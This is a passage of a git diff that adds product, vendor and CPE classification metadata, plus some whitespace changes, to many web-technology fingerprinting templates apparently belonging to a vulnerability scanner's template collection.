+ dsl:
+ - 'status_code == 200'
+ - 'contains(body, "Pexip Connect for Web")'
condition: and
-# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100af90ef4c39425515f15c2a49b1dd07e74bd26aba0fd5b7fdf4de51affef88aa7022030abc0a04cf5ed0a09b15afb4369b37bd3c3ccb275ae30cb4315691302e28aa0:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/php-detect.yaml b/http/technologies/php-detect.yaml
index 0f7daba169..65d194988d 100644
--- a/http/technologies/php-detect.yaml
+++ b/http/technologies/php-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: "X-Powered-By: PHP"
+ product: php
+ vendor: php
tags: tech,php
+ classification:
+ cpe: cpe:2.3:a:php:php:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/php-fusion-detect.yaml b/http/technologies/php-fusion-detect.yaml
index 2b91188891..4acdcb1044 100644
--- a/http/technologies/php-fusion-detect.yaml
+++ b/http/technologies/php-fusion-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
fofa-query: title="PHP-Fusion"
+ product: php-fusion
+ vendor: php-fusion
tags: php,tech,php-fusion
+ classification:
+ cpe: cpe:2.3:a:php-fusion:php-fusion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/phplist-detect.yaml b/http/technologies/phplist-detect.yaml
index abeee78371..587d63f0f0 100644
--- a/http/technologies/phplist-detect.yaml
+++ b/http/technologies/phplist-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"phplist"
+ product: phplist
+ vendor: phplist
tags: tech,phplist,detect
+ classification:
+ cpe: cpe:2.3:a:phplist:phplist:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/pi-hole-detect.yaml b/http/technologies/pi-hole-detect.yaml
index c25b46aaaa..7468868d29 100644
--- a/http/technologies/pi-hole-detect.yaml
+++ b/http/technologies/pi-hole-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 5
shodan-query: title:"Pi-hole"
+ product: pi-hole
+ vendor: pi-hole
tags: tech,pihole,detect
+ classification:
+ cpe: cpe:2.3:a:pi-hole:pi-hole:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/prestashop-detect.yaml b/http/technologies/prestashop-detect.yaml
index 3cf62cc913..5bee19282e 100644
--- a/http/technologies/prestashop-detect.yaml
+++ b/http/technologies/prestashop-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"PrestaShop"
+ product: prestashop
+ vendor: prestashop
tags: tech,cms,prestashop
+ classification:
+ cpe: cpe:2.3:a:prestashop:prestashop:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/privatebin-detect.yaml b/http/technologies/privatebin-detect.yaml
index 89624275cc..696c6bded2 100644
--- a/http/technologies/privatebin-detect.yaml
+++ b/http/technologies/privatebin-detect.yaml
@@ -1,5 +1,5 @@
-id: privatebin-detect
-
+id: privatebin-detect
+
info:
name: PrivateBin - Detect
author: righettod
@@ -12,27 +12,31 @@ info:
verified: true
max-request: 1
shodan-query: title:"PrivateBin"
+ product: privatebin
+ vendor: privatebin
tags: tech,privatebin,detect
-http:
- - method: GET
- path:
- - "{{BaseURL}}"
-
- redirects: true
- max-redirects: 2
-
- matchers:
- - type: dsl
- dsl:
- - 'status_code == 200'
- - 'contains_any(to_lower(body), "privatebin.js", "privatebin ", "content=\"privatebin")'
- condition: and
-
- extractors:
- - type: regex
- part: body
- group: 1
- regex:
+ classification:
+ cpe: cpe:2.3:a:privatebin:privatebin:*:*:*:*:*:*:*:*
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ redirects: true
+ max-redirects: 2
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains_any(to_lower(body), "privatebin.js", "privatebin ", "content=\"privatebin")'
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
- 'privatebin\.[a-z]{2,3}\?([0-9.]+)'
-# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502206c206521a18dcd4cbf7969b932bde363b8a28fd9e14a007680371285886235920221008efa426ddef32b50823c5167f532ec7462c91ed4ec6a62ef841eec9e5451a632:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/projectsend-detect.yaml b/http/technologies/projectsend-detect.yaml
index f4fb064d23..6fee8e0dee 100644
--- a/http/technologies/projectsend-detect.yaml
+++ b/http/technologies/projectsend-detect.yaml
@@ -12,9 +12,12 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:projectsend:projectsend:*:*:*:*:*:*:*:*
metadata:
max-request: 1
google-query: intext:Provided by ProjectSend
+ product: projectsend
+ vendor: projectsend
tags: tech,projectsend,edb
http:
diff --git a/http/technologies/pypiserver-detect.yaml b/http/technologies/pypiserver-detect.yaml
index 1c3a714388..64540cb611 100644
--- a/http/technologies/pypiserver-detect.yaml
+++ b/http/technologies/pypiserver-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"pypiserver"
+ product: pypiserver
+ vendor: python
tags: tech,pypiserver
+ classification:
+ cpe: cpe:2.3:a:python:pypiserver:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/roundcube-webmail-portal.yaml b/http/technologies/roundcube-webmail-portal.yaml
index c06ba40918..ec104fbe4c 100644
--- a/http/technologies/roundcube-webmail-portal.yaml
+++ b/http/technologies/roundcube-webmail-portal.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 2
shodan-query: http.component:"RoundCube"
+ product: webmail
+ vendor: roundcube
tags: roundcube,portal,tech
+ classification:
+ cpe: cpe:2.3:a:roundcube:webmail:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/rseenet-detect.yaml b/http/technologies/rseenet-detect.yaml
index 4a788c516d..d794cb9861 100644
--- a/http/technologies/rseenet-detect.yaml
+++ b/http/technologies/rseenet-detect.yaml
@@ -9,8 +9,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"R-SeeNet"
+ product: r-seenet
+ vendor: advantech
tags: tech,rseenet
+ classification:
+ cpe: cpe:2.3:a:advantech:r-seenet:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/rsshub-detect.yaml b/http/technologies/rsshub-detect.yaml
index 3c3ed87164..d8d6ac9cd8 100644
--- a/http/technologies/rsshub-detect.yaml
+++ b/http/technologies/rsshub-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: http.favicon.hash:-1893514038
+ product: rsshub
+ vendor: rsshub
tags: tech,rsshub
+ classification:
+ cpe: cpe:2.3:a:rsshub:rsshub:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/samsung-smarttv-debug.yaml b/http/technologies/samsung-smarttv-debug.yaml
index 8f9f3b8c72..08c80fb9a4 100644
--- a/http/technologies/samsung-smarttv-debug.yaml
+++ b/http/technologies/samsung-smarttv-debug.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Debug Config"
+ product: nt14u_firmware
+ vendor: samsung
tags: samsung,tech,iot
+ classification:
+ cpe: cpe:2.3:o:samsung:nt14u_firmware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/sharefile-storage-server.yaml b/http/technologies/sharefile-storage-server.yaml
index 0c8b94a09a..c922ea0ecc 100644
--- a/http/technologies/sharefile-storage-server.yaml
+++ b/http/technologies/sharefile-storage-server.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"ShareFile Storage Server"
+ product: sharefile_storage_zones_controller
+ vendor: citrix
tags: tech,citrix,sharefile
+ classification:
+ cpe: cpe:2.3:a:citrix:sharefile_storage_zones_controller:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/shopware-detect.yaml b/http/technologies/shopware-detect.yaml
index 381edf166e..509f4ed89c 100644
--- a/http/technologies/shopware-detect.yaml
+++ b/http/technologies/shopware-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
shodan-query: title:"shopware AG"
+ product: shopware
+ vendor: shopware
tags: tech,shopware,cms
+ classification:
+ cpe: cpe:2.3:a:shopware:shopware:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/simplesamlphp-detect.yaml b/http/technologies/simplesamlphp-detect.yaml
index 2cd1eff21c..cd67a94029 100644
--- a/http/technologies/simplesamlphp-detect.yaml
+++ b/http/technologies/simplesamlphp-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 2
shodan-query: "http.title:\"SimpleSAMLphp installation page\""
+ product: simplesamlphp
+ vendor: simplesamlphp
tags: tech,simplesamlphp,detect
+ classification:
+ cpe: cpe:2.3:a:simplesamlphp:simplesamlphp:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -28,4 +32,4 @@ http:
- 'status_code == 200'
- 'contains_any(to_lower(body), "you have successfully installed simplesamlphp", "simplesamlphp installation page", "/module.php/core/login-admin.php")'
condition: and
-# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008947ba7ebb0debe88119bad4ee31ab76e2aef6d84723058966d9508693062a91022100cdf298c84060a7365624019fdf4f9bd78b3d16c4ffd62e7ad7aec035ede9cc97:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/sitecore-cms.yaml b/http/technologies/sitecore-cms.yaml
index 303bbce478..78040e3107 100644
--- a/http/technologies/sitecore-cms.yaml
+++ b/http/technologies/sitecore-cms.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"sitecore"
+ product: cms
+ vendor: sitecore
tags: cms,sitecore,tech
+ classification:
+ cpe: cpe:2.3:a:sitecore:cms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/smartstore-detect.yaml b/http/technologies/smartstore-detect.yaml
index 3fbff40d7a..376af8bd5e 100644
--- a/http/technologies/smartstore-detect.yaml
+++ b/http/technologies/smartstore-detect.yaml
@@ -9,8 +9,12 @@ info:
metadata:
max-request: 1
shodan-query: http.html:'content="Smartstore'
+ product: smartstore
+ vendor: smartstore
tags: tech,smartstore,oss
+ classification:
+ cpe: cpe:2.3:a:smartstore:smartstore:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/snipeit-panel.yaml b/http/technologies/snipeit-panel.yaml
index c33dda2d3e..96945515c3 100644
--- a/http/technologies/snipeit-panel.yaml
+++ b/http/technologies/snipeit-panel.yaml
@@ -9,9 +9,12 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:snipeitapp:snipe-it:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.favicon.hash:431627549
+ product: snipe-it
+ vendor: snipeitapp
tags: panel,snipeit,tech
http:
diff --git a/http/technologies/sogo-detect.yaml b/http/technologies/sogo-detect.yaml
index 8f0ca9ea71..9f2581ad51 100644
--- a/http/technologies/sogo-detect.yaml
+++ b/http/technologies/sogo-detect.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 2
shodan-query: http.title:"SOGo"
+ product: sogo
+ vendor: alinto
tags: sogo,tech
+ classification:
+ cpe: cpe:2.3:a:alinto:sogo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/statamic-detect.yaml b/http/technologies/statamic-detect.yaml
index 95c73e7dff..e6a0770856 100644
--- a/http/technologies/statamic-detect.yaml
+++ b/http/technologies/statamic-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: "Statamic"
+ product: statamic
+ vendor: statamic
tags: tech,statamic,detect
+ classification:
+ cpe: cpe:2.3:a:statamic:statamic:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -26,4 +30,4 @@ http:
part: header
regex:
- 'X-Powered-By:(.*)Statamic'
-# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022056716af6b1942e84b678041e3433d215c8a0a61e9a77d2a1ff039396493f930a02205a431e513f4372119b25a1342dc81e41ceeb4173526610df4a7d7e2db3af003d:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/subrion-cms-detect.yaml b/http/technologies/subrion-cms-detect.yaml
index fd7d1aede9..bf156e5e20 100644
--- a/http/technologies/subrion-cms-detect.yaml
+++ b/http/technologies/subrion-cms-detect.yaml
@@ -8,8 +8,12 @@ info:
max-request: 1
shodan-query: http.component:"Subrion"
fofa-query: title="subrion"
+ product: subrion
+ vendor: intelliants
tags: subrion,tech
+ classification:
+ cpe: cpe:2.3:a:intelliants:subrion:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/thinkphp-detect.yaml b/http/technologies/thinkphp-detect.yaml
index 9100a16935..a838f2094f 100644
--- a/http/technologies/thinkphp-detect.yaml
+++ b/http/technologies/thinkphp-detect.yaml
@@ -9,11 +9,14 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:thinkphp:thinkphp:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 2
shodan-query: title:"ThinkPHP"
fofa-query: app="ThinkPHP"
+ product: thinkphp
+ vendor: thinkphp
tags: thinkphp,tech,detect,intrusive
http:
diff --git a/http/technologies/tibco-businessconnect-detect.yaml b/http/technologies/tibco-businessconnect-detect.yaml
index 671e1e2a71..d88aa0886f 100644
--- a/http/technologies/tibco-businessconnect-detect.yaml
+++ b/http/technologies/tibco-businessconnect-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: http.html:"TIBCO BusinessConnect"
+ product: businessconnect
+ vendor: tibco
tags: tibco,detect,tech
+ classification:
+ cpe: cpe:2.3:a:tibco:businessconnect:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -25,4 +29,4 @@ http:
- 'status_code == 200'
- 'contains(header, "TIBCO BusinessConnect")'
condition: and
-# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022023712d56e0a2dc0d0bf7d38c1fda0f6bbeeea9729fd945f40c4fe233b716b3f602202da6e40ef235d919061376e66ac3d28b499f7a0ac60662800e2b73c94bd6dbab:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/tibco-spotfire-services-detect.yaml b/http/technologies/tibco-spotfire-services-detect.yaml
index 70e7a40c57..3a5574e781 100644
--- a/http/technologies/tibco-spotfire-services-detect.yaml
+++ b/http/technologies/tibco-spotfire-services-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 4
shodan-query: "TIBCO Spotfire Server"
+ product: spotfire_statistics_services
+ vendor: tibco
tags: tech,tibco,detect
+ classification:
+ cpe: cpe:2.3:a:tibco:spotfire_statistics_services:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -36,4 +40,4 @@ http:
group: 1
regex:
- 'Version\s+([0-9.\s\(\)V]+)'
-# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100b9c1d679fef17c6ab5d3a49b8d140da5b95bd33f5ec3066f51c131733cb8671302203c738559c63ec2502eed182a3af5e63a57e8f8931ebf750e49c7c4d0d5c8ad43:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/tileserver-gl.yaml b/http/technologies/tileserver-gl.yaml
index 3f6a869798..6649acee3f 100644
--- a/http/technologies/tileserver-gl.yaml
+++ b/http/technologies/tileserver-gl.yaml
@@ -11,10 +11,13 @@ info:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:tileserver:tileservergl:*:*:*:*:*:*:*:*
metadata:
max-request: 1
shodan-query: http.title:"TileServer GL - Server for vector and raster maps with GL styles"
google-query: intitle:"TileServer GL - Server for vector and raster maps with GL styles"
+ product: tileservergl
+ vendor: tileserver
tags: tech,tileserver,edb
http:
diff --git a/http/technologies/tinyproxy-detect.yaml b/http/technologies/tinyproxy-detect.yaml
index a0cb2d92c8..d8100b3ea7 100644
--- a/http/technologies/tinyproxy-detect.yaml
+++ b/http/technologies/tinyproxy-detect.yaml
@@ -12,8 +12,12 @@ info:
verified: true
max-request: 1
shodan-query: "Server: tinyproxy"
+ product: tinyproxy
+ vendor: tinyproxy_project
tags: tech,proxy,detect
+ classification:
+ cpe: cpe:2.3:a:tinyproxy_project:tinyproxy:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -30,4 +34,4 @@ http:
- type: kval
kval:
- server
-# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221008ec97763de41920c6428a4b0e039d72a2a87b2e8d2fd891cfa7a70b0bd2c7ddc022100a1fbedfc84f6e0aaf4233a640e2589dfc2341243472f7125eb47bc15a3917e65:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/typo3-detect.yaml b/http/technologies/typo3-detect.yaml
index 815a432bf8..2fddb0de99 100644
--- a/http/technologies/typo3-detect.yaml
+++ b/http/technologies/typo3-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.component:"TYPO3"
+ product: typo3
+ vendor: typo3
tags: tech,typo3
+ classification:
+ cpe: cpe:2.3:a:typo3:typo3:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/utility-service-detect.yaml b/http/technologies/utility-service-detect.yaml
index d100051f95..ad41ea7162 100644
--- a/http/technologies/utility-service-detect.yaml
+++ b/http/technologies/utility-service-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Utility Services Administration"
+ product: aura_utility_services
+ vendor: avaya
tags: tech,avaya,aura
+ classification:
+ cpe: cpe:2.3:a:avaya:aura_utility_services:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/vbulletin-detect.yaml b/http/technologies/vbulletin-detect.yaml
index e0b437b664..2dd52aaee4 100644
--- a/http/technologies/vbulletin-detect.yaml
+++ b/http/technologies/vbulletin-detect.yaml
@@ -12,8 +12,12 @@ info:
max-request: 1
shodan-query: title:"Powered By vBulletin"
google-query: intext:"Powered By vBulletin"
+ product: vbulletin
+ vendor: vbulletin
tags: tech,vbulletin
+ classification:
+ cpe: cpe:2.3:a:vbulletin:vbulletin:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/versa/versa-analytics-server.yaml b/http/technologies/versa/versa-analytics-server.yaml
index f18fc0086f..9afa4b5a40 100644
--- a/http/technologies/versa/versa-analytics-server.yaml
+++ b/http/technologies/versa/versa-analytics-server.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: "Versa-Analytics-Server"
+ product: versa_analytics
+ vendor: versa-networks
tags: tech,versa,analytics
+ classification:
+ cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/versa/versa-director-api.yaml b/http/technologies/versa/versa-director-api.yaml
index 21754b276c..957ad7d470 100644
--- a/http/technologies/versa/versa-director-api.yaml
+++ b/http/technologies/versa/versa-director-api.yaml
@@ -11,8 +11,12 @@ info:
verified: true
max-request: 1
shodan-query: html:"Versa Networks"
+ product: versa_director
+ vendor: versa-networks
tags: api,versa,tech
+ classification:
+ cpe: cpe:2.3:a:versa-networks:versa_director:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/versa/versa-networks-detect.yaml b/http/technologies/versa/versa-networks-detect.yaml
index 20b1d17344..6ad5ffc272 100644
--- a/http/technologies/versa/versa-networks-detect.yaml
+++ b/http/technologies/versa/versa-networks-detect.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 7
shodan-query: html:"Versa Networks"
+ product: versa_analytics
+ vendor: versa-networks
tags: tech,versa
+ classification:
+ cpe: cpe:2.3:a:versa-networks:versa_analytics:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/vivotex-web-console-detect.yaml b/http/technologies/vivotex-web-console-detect.yaml
index 590bca51ee..ab7109e0a3 100644
--- a/http/technologies/vivotex-web-console-detect.yaml
+++ b/http/technologies/vivotex-web-console-detect.yaml
@@ -8,8 +8,12 @@ info:
max-request: 1
shodan-query: title:"VIVOTEK Web Console"
fofa-query: app="VIVOTEK-Web-Console"
+ product: ip7361
+ vendor: vivotek
tags: tech,vivotex,console
+ classification:
+ cpe: cpe:2.3:h:vivotek:ip7361:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/vmware/vmware-horizon-version.yaml b/http/technologies/vmware/vmware-horizon-version.yaml
index 5638dc2c45..3f3082cbc2 100644
--- a/http/technologies/vmware/vmware-horizon-version.yaml
+++ b/http/technologies/vmware/vmware-horizon-version.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"Vmware Horizon"
+ product: horizon_view
+ vendor: vmware
tags: vmware,tech
+ classification:
+ cpe: cpe:2.3:a:vmware:horizon_view:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/wing-ftp-service-detect.yaml b/http/technologies/wing-ftp-service-detect.yaml
index ca7b15e670..9c4b94a44d 100644
--- a/http/technologies/wing-ftp-service-detect.yaml
+++ b/http/technologies/wing-ftp-service-detect.yaml
@@ -10,8 +10,12 @@ info:
verified: true
max-request: 1
shodan-query: "Wing FTP Server"
+ product: wing_ftp_server
+ vendor: wftpserver
tags: tech,ftp,wing,detect
+ classification:
+ cpe: cpe:2.3:a:wftpserver:wing_ftp_server:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -22,4 +26,4 @@ http:
part: header
words:
- "Wing FTP Server"
-# digest: 4b0a00483046022100f10f68fc40d77bd9d1d477fcb141f9a3aa3759aa19af1d46cb13162352e3a7520221008ed11cdb28af81f4949dffa122ccd3fab3cf3ccba97be4993ed4696a67540203:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100f10f68fc40d77bd9d1d477fcb141f9a3aa3759aa19af1d46cb13162352e3a7520221008ed11cdb28af81f4949dffa122ccd3fab3cf3ccba97be4993ed4696a67540203:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/wms-server-detect.yaml b/http/technologies/wms-server-detect.yaml
index 23e14e21c0..64fce98c14 100644
--- a/http/technologies/wms-server-detect.yaml
+++ b/http/technologies/wms-server-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
fofa-query: app="WmsServer"
+ product: wms
+ vendor: wms_project
tags: tech,wms,httpserver
+ classification:
+ cpe: cpe:2.3:a:wms_project:wms:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml
index 0af80e7daf..04515e46ab 100644
--- a/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml
+++ b/http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml
@@ -1,5 +1,5 @@
-id: wp-bricks-builder-theme
-
+id: wp-bricks-builder-theme
+
info:
name: WordPress Bricks Builder Theme Version
author: Anonymous
@@ -12,26 +12,30 @@ info:
verified: true
max-request: 1
publicwww-query: "/wp-content/themes/bricks/"
+ product: bricks
+ vendor: bricksbuilder
tags: wordpress,theme,wp-theme,wp,bricks
-http:
- - method: GET
- path:
- - "{{BaseURL}}/wp-content/themes/bricks/readme.txt"
-
- matchers-condition: and
- matchers:
- - type: word
- part: body
- words:
- - "Bricks - Visual Website Builder"
-
- - type: regex
- part: body
- regex:
- - "Stable tag:([ 0-9.]+)"
-
- - type: status
- status:
+ classification:
+ cpe: cpe:2.3:a:bricksbuilder:bricks:*:*:*:*:wordpress:*:*:*
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/themes/bricks/readme.txt"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: body
+ words:
+ - "Bricks - Visual Website Builder"
+
+ - type: regex
+ part: body
+ regex:
+ - "Stable tag:([ 0-9.]+)"
+
+ - type: status
+ status:
- 200
-# digest: 4b0a004830460221009c78d037f624ed7c52cb7fdf8a4bf76d529fed8e880d6cbc8ec5e31d5857e38a0221008e34473c003bb6105607aac0fc1397eb9764f9ec081a7114e6f4983d11522afb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a004830460221009c78d037f624ed7c52cb7fdf8a4bf76d529fed8e880d6cbc8ec5e31d5857e38a0221008e34473c003bb6105607aac0fc1397eb9764f9ec081a7114e6f4983d11522afb:922c64590222798bb761d5b6d8e72950
diff --git a/http/technologies/xenforo-detect.yaml b/http/technologies/xenforo-detect.yaml
index 99a5abb2bc..7072b60742 100644
--- a/http/technologies/xenforo-detect.yaml
+++ b/http/technologies/xenforo-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"XenForo"
+ product: xenforo
+ vendor: xenforo
tags: tech,xenforo
+ classification:
+ cpe: cpe:2.3:a:xenforo:xenforo:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/xerox-workcentre-detect.yaml b/http/technologies/xerox-workcentre-detect.yaml
index a11312a3d0..2e25129d7c 100644
--- a/http/technologies/xerox-workcentre-detect.yaml
+++ b/http/technologies/xerox-workcentre-detect.yaml
@@ -8,8 +8,12 @@ info:
verified: true
max-request: 1
shodan-query: title:"XEROX WORKCENTRE"
+ product: workcentre_7970i
+ vendor: xerox
tags: tech,xerox,workcentre
+ classification:
+ cpe: cpe:2.3:h:xerox:workcentre_7970i:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/yapi-detect.yaml b/http/technologies/yapi-detect.yaml
index cf56584b89..7953dc6b7d 100644
--- a/http/technologies/yapi-detect.yaml
+++ b/http/technologies/yapi-detect.yaml
@@ -7,8 +7,12 @@ info:
metadata:
max-request: 1
shodan-query: http.title:"YApi"
+ product: yapi
+ vendor: ymfe
tags: tech,yapi
+ classification:
+ cpe: cpe:2.3:a:ymfe:yapi:*:*:*:*:*:*:*:*
http:
- method: GET
path:
diff --git a/http/technologies/yeswiki-detect.yaml b/http/technologies/yeswiki-detect.yaml
index f28c6ad9c5..285e27d734 100644
--- a/http/technologies/yeswiki-detect.yaml
+++ b/http/technologies/yeswiki-detect.yaml
@@ -9,10 +9,13 @@ info:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N
cvss-score: 0
cwe-id: CWE-200
+ cpe: cpe:2.3:a:yeswiki:yeswiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
shodan-query: http.html:"yeswiki"
+ product: yeswiki
+ vendor: yeswiki
tags: yeswiki,panel,tech
http:
diff --git a/http/technologies/yourls-detect.yaml b/http/technologies/yourls-detect.yaml
index c80f0b982d..b2c9b50d7d 100644
--- a/http/technologies/yourls-detect.yaml
+++ b/http/technologies/yourls-detect.yaml
@@ -13,8 +13,12 @@ info:
max-request: 1
shodan-query: title:"Your Own URL Shortener"
fofa-query: title="Your Own URL Shortener"
+ product: yourls
+ vendor: yourls
tags: tech,yourls
+ classification:
+ cpe: cpe:2.3:a:yourls:yourls:*:*:*:*:*:*:*:*
http:
- method: GET
path:
@@ -45,4 +49,4 @@ http:
regex:
- 'YOURLS<\/a>([ a-z0-9.-]+)'
- 'content="YOURLS([ 0-9.]+)"'
-# digest: 4a0a004730450221008698f71c950b2a19bad6799e39feac48619b5c545de1929f77384613ff4134f10220204bf322f013ccd1a5ee781b73949f32bc9ada356a02aaeab3ffb91b1f247190:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
